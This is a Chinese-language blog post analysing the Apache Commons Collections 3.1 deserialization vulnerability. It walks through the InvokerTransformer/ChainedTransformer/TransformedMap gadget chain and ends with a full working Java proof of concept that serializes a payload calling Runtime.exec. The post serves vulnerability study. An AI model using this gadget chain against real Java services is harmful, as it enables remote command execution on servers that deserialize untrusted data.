反序列化漏洞_ApacheCommonsCollections反序列化漏洞分析

最新推荐文章于 2024-03-01 15:22:24 发布
最新推荐文章于 2024-03-01 15:22:24 发布
阅读量747 收藏 1
点赞数
文章标签: 反序列化漏洞 反序列化漏洞原理 有哪些函数可以反截图、
4a6f4eabb02d756a6d86eefc8d7fc66d.png 点击蓝字关注我们吧!

环境搭建

本文由“壹伴编辑器”提供技术

JDK版本为为1.6,

引入commons-collections-3.1.jar包,具体引入方法为:

File -> Project Settings -> Modules -> Dependencies

点击加号选择导入JARs包,再选择包的地址,点击apply成功引入。

6d5a43cb698a4518a4dfa58f91ea850a.png

d72e11c0c23d4b29f19c3e258f05cfb0.gif

Poc():

本文由“壹伴编辑器”提供技术

bfa9c519b08ab1b7fbad64a5db78a792.png

d72e11c0c23d4b29f19c3e258f05cfb0.gif

分析:

本文由“壹伴编辑器”提供技术

前面提到过要实现序列化与反序列化目标对象要实现Serializable接口。

Apache Commons Collections中有一个特殊的接口,

其中有一个实现该接口的类可以通过调用Java的反射机制来调用任意函数,叫做InvokerTransformer。

InvokerTransformer部分源码,可以看到其实现了Transformer和Serializable接口。

d08ee1d6ef730bbe50ef1c44827f70c5.png

7214d7317de3c773705ad0f90a40572a.png

本文由“壹伴编辑器”提供技术

InvokerTranformer类中的transform方法,该方法使用反射进行函数调用

input参数是要反射的对象,iMethodName、iParamTypes分别是调用的方法名称和参数类型,iArgs是要调用的方法的参数。这三个参数都是可控的。

67cfe84b5f3e555c48b3c30dbc739dfb.png

本文由“壹伴编辑器”提供技术

ConstantTransformer类的transform()方法是返回iConstant属性,并且该属性也是可控的。

ChainedTransformer类很关键,这是它的构造函数:

c901d658f118109cb8981dd93605e236.png

从其构造函数可以看出它是传入一个Transform数组,在看一下它的transform()方法。

b0ee5b2a0fe85c44044e6aa5f1dfad00.png

本文由“壹伴编辑器”提供技术

这里使用循环来调用Transformer数组的transform()方法,

并且使用object作为后一个调用transform()方法的参数,这里我们结合前面的poc代码看:

9ceebe04b3ac383731b9289fdea9ef61.png

本文由“壹伴编辑器”提供技术

这里代码有些绕,要结合前面对各个类的分析,

大概意思是创建一个transformers数组:

第一个参数是ConstantTransformer对象, 后面参数都是InvokerTransformer对象

(备注:InvokerTransformer类和ConstantTransformer类前面都有提到)

最后创建ChainedTransformer对象并将transformers数组传入。

Debug截图:

f5ff0e9626b924457d5a0f56fc9438e4.png

本文由“壹伴编辑器”提供技术

c9dc983ecdc7ae04fe0463e69ca5756f.png

dcea5311be30c92c713b3c60923b5b76.png

本文由“壹伴编辑器”提供技术

这个checkSetValue()会触发transform方法。然后我们思路清晰起来了,

首先,

构造一个Map和一个代码执行的ChainedTransforme

生成一个TransformedMap。

Poc中的代码如下:

da84541f7caa6695b15ae1e252c24ed7.png

本文由“壹伴编辑器”提供技术

Outmap就是已经构造好的TransformedMap,

下一步需要能让服务器反序列化对象时,触发outmap的checkSetValue()方法。

这时就要用到AnnotationInvocationHandler类,

这个类中有一个变量memberValues是Map类型,如下图所示:

e52884b0e9f88fa16c4f5f0937a1d7de.png

本文由“壹伴编辑器”提供技术

AnnotationInvocationHandler的readObject()方法中,对memberValues的每一项都调用了setValue()函数,

代码如下:

a394d421859013bf93de8af54ca545df.png

本文由“壹伴编辑器”提供技术

这里的setValue()函数就会触发checkValue()函数,代码如图:

5b00ab0a87ba35663f62b78f1319271e.png

本文由“壹伴编辑器”提供技术

所以我们要使用outmap来构造AnnotationInvocationHandler,进行序列化,

后面触发readerObject()反序列化时就能实现命令执行:

b47f4c3b3d7bd9af77fbb896e21564fa.png

本文由“壹伴编辑器”提供技术

下面分别是序列化与反序列化的简单本地模拟代码:

772e247fa206d6e8a1faebfc9b40963f.png

本文由“壹伴编辑器”提供技术

一般情况是服务器有一个反序列化接口,我们将自己构造的恶意代码序列化后通过接口远程调用,或者传输到服务器上,服务器进行反序列化调用readObject()函数;

然后成功命令执行。

01b5f2f01b93bb635e30959a3a3529d9.png

本文由“壹伴编辑器”提供技术支

服务器端反序列化执行大概步骤:

d21e475bb9fc78b4f2bb73a3e8217db2.png

漏洞影响:

1.Spring Framework <= 3.0.5,<= 2.0.6;

2.Groovy < 2.4.4;

3.Apache Commons Collections <= 3.2.1,<= 4.0.0;

附POC代码:

package com.company;import java.io.File;import java.io.FileInputStream;import java.io.FileOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.annotation.Retention;import java.lang.reflect.Constructor;import java.util.HashMap;import java.util.Map;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;class test1 {    public static Object Reverse_Payload() throws Exception {        Transformer[] transformers = new Transformer[] {new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),new InvokerTransformer("exec", new Class[] { String.class }, new Object[] { "calc.exe" }) };        Transformer transformerChain = new ChainedTransformer(transformers);Map innermap = new HashMap();        innermap.put("value", "value");Map outmap = TransformedMap.decorate(innermap, null, transformerChain);//通过反射获得AnnotationInvocationHandler类对象        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");//通过反射获得cls的构造函数        Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);//这里需要设置Accessible为true,否则序列化失败        ctor.setAccessible(true);//通过newInstance()方法实例化对象Object instance = ctor.newInstance(Retention.class, outmap);return instance;    }    public static void main(String[] args) throws Exception {        GeneratePayload(Reverse_Payload(),"obj");        payloadTest("obj");    }    public static void GeneratePayload(Object instance, String file)            throws Exception {//将构造好的payload序列化后写入文件中        File f = new File(file);        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));        out.writeObject(instance);        out.flush();        out.close();    }    public static void payloadTest(String file) throws Exception {//读取写入的payload,并进行反序列化        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));in.readObject();in.close();    }}

end

a0cd84913fceed004bd22c919aab59b3.png

weixin_39618339
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【java】Java的commons-collections反序列化漏洞
九师兄
07-19 67
Apache Commons CollectionsApache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections中有一个InvokerTransformer实现了Transformer接口,主要作用为调用Java的射机制来调用任意函数。影响组件版本:
Java反序列化漏洞Apache Commons Collections
m0_61506558的博客
08-08 795
CC对JDK标准库的集合类进行了扩展,添加了一些数据结构,并且提供了工具类2015年1月28日,有两个黑客发现了CC的漏洞利用链2.2 源码分析transform()方法可以通过射机制来进行任意函数的调用通过链式调用,实现InvokeTransformer方法的自动触发1、对利用类进行序列化,然后交给Java程序反序列化2、在进行反序列化时,会执行方法,该方法会用setValue对成员变量的Value值进行修改3、value修改触发了。......
Apache Commons Collections反序列化漏洞分析与复现
smellycat000的专栏
11-30 3691
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析漏洞复现。1.2 漏洞分析存在安全缺陷的版本:Apache Commons Collections3.2.1以下,...
JAVA 反序列化Apache Commons Collections 反序列化漏洞分析
辛勤搬砖的门卫的专栏
03-01 1982
Apache Commons Collections 反序列化漏洞研究
Java反序列化漏洞Apache Commons Collections
南迪叶先森
06-30 771
Java反序列化漏洞Apache Commons Collections 公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! 前言: 最近静下心来看了很多大牛的笔记,博客,收获甚多,所以在此记录一下入坑Java安全的第一步。 Apache Commons CollectionsApache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections
Apache Commons Collections反序列化漏洞分析
辛勤搬砖的门卫的专栏
01-05 1283
Apache Commons Collections反序列化漏洞分析
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
最新发布
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
小白看得懂的MySQL JDBC 反序列化漏洞分析 - 先知社区1
08-03
【MySQL JDBC 反序列化漏洞分析】 MySQL JDBC 反序列化漏洞主要涉及到Java数据库连接(JDBC)驱动程序中的安全问题。JDBC是Java中用于与数据库交互的标准接口,允许开发者使用Java语言执行SQL语句。在特定版本的...
Java 反序列化漏洞-Apache Commons Collections3
cjdgg的博客
03-02 4698
Java 反序列化漏洞-Apache Commons Collections3前言javassist+TemplatesImplcom.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter 前言 之前已经学了CC1和CC2,接下来继续学习CC3。在CC2中我们用到了javassist修改字节码并配合TemplatesImpl攻击链来使用,因此我们很自然而然的想到,如果我们直接用javassist修改字节码并配合TemplatesImpl攻击链使用,就无需用I
Apache-Commons-Collections漏洞问题
白话机器学习
08-15 1272
Apache-Commons-Collections这个框架,相信每一个Java程序员都不陌生,这是一个非常著名的开源框架。但是,他其实也曾经被爆出过序列化安全漏洞,可以被远程执行命令。
反序列化渗透与攻防(三)之Apache Commons Collections反序列化漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-14 1368
Apache Commons Collections 是一个扩展了Java标准库里集合类Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件,Commons Collections被广泛应用于各种Java应用的开发Commons Collections 实现了一个TransformedMap类,该类是对Java标准数据结构Map接口的一个扩展。
Apache Commons Collection3.2.1反序列化分析(CC1)
st3pby的博客
01-29 1923
Apache软件基金会的一个开源项目,它提供了一组可复用的数据结构和算法的实现,旨在扩展和增强Java集合框架,以便更好地满足不同类型应用的需求。该项目包含了多种不同类型的集合类、迭代器、队列、堆栈、映射、列表、集等数据结构实现,以及许多实用程序类和算法实现。它的代码质量较高,被广泛应用于Java应用程序开发中。Commons Collections 3.1 版本的利用链衍生出多个版本的利用方式,但其核心部分是相同的,不同之处在于中间过程的构造。
JAVA反序列化Apache Commons Collections反序列化漏洞分析
chenwan8737的博客
08-08 1015
Apache Commons Collections反序列化漏洞必然是2015年影响重大的漏洞之一,同时也开启了各类java序列漏洞的大门,这几年大量各类java反序列化漏洞不断出现。java反序列化漏洞基本一出必高危,风险程度极大,最近研究了一些反序列化漏洞,本篇记录apache ...
Apache commons-collections反序列化漏洞(TransformedMap利用链)
qq_43936524的博客
04-10 552
文章目录Commons-collections概述InvokerTransformer射触发ChainedTransformer遍历触发封装为TransformedMap寻找ReadObject触发点AnnotationInvocationHandler触发(JDK1.7)BadAttributeValueExpException(JDK1.8) Commons-collections概述 官网对Commons-collections的说明 Java commons-collections是JDK 1.
【高危】Apache ShardingSphere 反序列化漏洞
murphysec的博客
07-25 450
Apache ShardingSphere 是一个开源的分布式数据库中间件。在 Apache ShardingSphere 受影响版本中,由于 Apache ShardingSphere-Agent 在反序列化 YAML 配置文件时未正确验证不受信任数据,攻击者可以利用 SnakeYAML 反序列化 java.net.URLClassLoader 加载恶意 JAR 文件,再结合 javax.script.ScriptEngineManager 反序列化 JAR 文件来执行恶意代码。
java反序列化漏洞学习之Apache Commons Collections
东方
07-30 1297
demo 一波。 最近群里都在学Java 参考: https://p0sec.net/index.php/archives/121/ https://www.xmanblog.net/java-deserialize-apache-commons-collections/ 1 环境 import org.apache.commons.collections.functors.Invoker...
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值